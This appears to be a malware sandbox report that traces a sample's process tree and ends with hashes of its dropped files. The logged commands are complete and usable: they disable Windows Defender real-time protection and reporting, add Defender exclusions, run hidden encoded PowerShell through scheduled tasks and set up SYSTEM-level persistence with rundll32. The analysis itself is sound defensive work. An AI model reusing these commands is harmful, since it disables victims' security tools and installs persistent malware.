\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:972
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:992 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1460
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1804
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gONfzDwZI" /SC once /ST 07:51:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gONfzDwZI"4⤵PID:1640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gONfzDwZI"4⤵PID:432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhiKLDYYmOVJYRnmNA" /SC once /ST 23:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\UsCmcJSqHTXYNvr\drUnsiw.exe\" LE /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1880
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E0735564-BD49-40CD-820E-2294EC518637} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]1⤵PID:1068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2044
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1392 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1692
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1640
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1840
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1600
-
C:\Windows\system32\taskeng.exetaskeng.exe {0CD77B96-61D8-47A8-8524-DD71624007B5} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\UsCmcJSqHTXYNvr\drUnsiw.exeC:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\UsCmcJSqHTXYNvr\drUnsiw.exe LE /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1848 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvXrmFPJE" /SC once /ST 03:37:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvXrmFPJE"3⤵PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvXrmFPJE"3⤵PID:1364
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1736
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1484
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcTGgklzv" /SC once /ST 04:08:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcTGgklzv"3⤵PID:1096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcTGgklzv"3⤵PID:1500
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:323⤵PID:1684
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:643⤵PID:1364
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:323⤵PID:1092
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:324⤵PID:1892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:643⤵PID:468
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:644⤵PID:608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\erSyCIiXgZXqUzOL\LlaSbTVz\RBmIlGlOeQCQbHRV.wsf"3⤵PID:684
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\erSyCIiXgZXqUzOL\LlaSbTVz\RBmIlGlOeQCQbHRV.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1012 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TloWHzQxU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TloWHzQxU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSoSRLDipKupC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSoSRLDipKupC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqPaCWxmyWUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqPaCWxmyWUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zopNtCPofqZRshxFhVR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zopNtCPofqZRshxFhVR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\MIOQmlFchkRGycVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\MIOQmlFchkRGycVB" /t REG_DWORD /d 0 /reg:644⤵PID:1648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL" /t REG_DWORD /d 0 /reg:324⤵PID:1484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:644⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:324⤵PID:1120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:644⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TloWHzQxU" /t REG_DWORD /d 0 /reg:324⤵PID:1080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TloWHzQxU" /t REG_DWORD /d 0 /reg:644⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSoSRLDipKupC" /t REG_DWORD /d 0 /reg:324⤵PID:1968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSoSRLDipKupC" /t REG_DWORD /d 0 /reg:644⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqPaCWxmyWUn" /t REG_DWORD /d 0 /reg:324⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqPaCWxmyWUn" /t REG_DWORD /d 0 /reg:644⤵PID:1248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zopNtCPofqZRshxFhVR" /t REG_DWORD /d 0 /reg:324⤵PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zopNtCPofqZRshxFhVR" /t REG_DWORD /d 0 /reg:644⤵PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\MIOQmlFchkRGycVB" /t REG_DWORD /d 0 /reg:324⤵PID:1572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\MIOQmlFchkRGycVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL" /t REG_DWORD /d 0 /reg:644⤵PID:1016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL" /t REG_DWORD /d 0 /reg:324⤵PID:1224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:324⤵PID:1392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\erSyCIiXgZXqUzOL" /t REG_DWORD /d 0 /reg:644⤵PID:588
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAnATFkQX" /SC once /ST 09:54:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Windows security bypass
- Creates scheduled task(s)
PID:1100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAnATFkQX"3⤵PID:584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAnATFkQX"3⤵PID:1500
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1324
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1716
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:852
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jAPQkthTMSklmsWLq" /SC once /ST 11:59:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\erSyCIiXgZXqUzOL\GVSABzKakgckLNM\PJTvDFK.exe\" 4P /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jAPQkthTMSklmsWLq"3⤵PID:1380
-
-
-
C:\Windows\Temp\erSyCIiXgZXqUzOL\GVSABzKakgckLNM\PJTvDFK.exeC:\Windows\Temp\erSyCIiXgZXqUzOL\GVSABzKakgckLNM\PJTvDFK.exe 4P /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2044 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhiKLDYYmOVJYRnmNA"3⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1012
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1628
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1704
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TloWHzQxU\lLCFcP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rSkSwYHQOxYzETV" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rSkSwYHQOxYzETV2" /F /xml "C:\Program Files (x86)\TloWHzQxU\kCfTIxI.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rSkSwYHQOxYzETV"3⤵PID:1888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rSkSwYHQOxYzETV"3⤵PID:1664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GdxfyAawfiNbBt" /F /xml "C:\Program Files (x86)\QxhTRhBLgDrU2\mPDPrIb.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OxFcncghDbRjM2" /F /xml "C:\ProgramData\MIOQmlFchkRGycVB\zAPsEVE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ktKVYLJneUOMgXpHm2" /F /xml "C:\Program Files (x86)\zopNtCPofqZRshxFhVR\gdlpTIo.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uEWnBcEBihOfoSaLKpA2" /F /xml "C:\Program Files (x86)\eSoSRLDipKupC\NUfmoRt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lCFTjNOFEcSKwrIvx" /SC once /ST 07:48:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\erSyCIiXgZXqUzOL\kjznRVaO\GeHiSRE.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "lCFTjNOFEcSKwrIvx"3⤵PID:1892
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1336
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1568
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:968
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jAPQkthTMSklmsWLq"3⤵PID:1988
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\erSyCIiXgZXqUzOL\kjznRVaO\GeHiSRE.dll",#1 /site_id 5254032⤵PID:1036
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\erSyCIiXgZXqUzOL\kjznRVaO\GeHiSRE.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1300 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lCFTjNOFEcSKwrIvx"4⤵PID:1964
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1544
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2012
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-732538406166667127-15773122129503689851169562889-20080210281946635959-139215792"1⤵
- Windows security bypass
PID:1484
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "48757361710438183586239948739629034781960980012-775040551-16859345901154659969"1⤵PID:1120
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1964
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57724a9e7fa45029c1c954ce425794aa7
SHA114cb7384aa2c1a3bb17b1632f7e0bde0f4be9de5
SHA256ee5ddd8e201270305053d72196069926dc38176855cc03fe2bfc7c42d1d0f55e
SHA51243e864ce19bd3caeede22523eb5bc6c72592b4b9a3689af9234546a8f642782bc231ee65a26e02fb8d6c48c50b7a3a4b2f53c64e989c4f11de60437859fc955a
-
Filesize
2KB
MD57330069f75801256f18364ac360d2c3e
SHA19b8675bd070a7d2da46edcba3bc4e85741b66fad
SHA256b571a453c528b891ca7f3511532c97a6426a33159e6803a40b067860598a7eba
SHA51270379c1ed3184fb863f00bc940cf6e252f2f102c607e62799087882b3d9e8131bfc8775b6063f15fa8a22b8c5cdb1b3bcac4e00cab844b79bed9575895a27f86
-
Filesize
2KB
MD5be5a04228fc6467e2eb2ef491c32f0cd
SHA11fd5ff6965e5b268f6ac42e7cd9a924c57e52320
SHA256f9373baaeb21790347461e8b270655c61d20078ec9230803e7ed169b7c2dd4e6
SHA512f23d27f7467d17970e23a3ab9beafb1099649b7ed7a8cc34fe9808f4beacbd56ce84c7c8f6fe196921aa359b25de643f747ed2c9422429cb53b954092e0ef306
-
Filesize
2KB
MD5e707d86ed08358d3780d54aa0ce38364
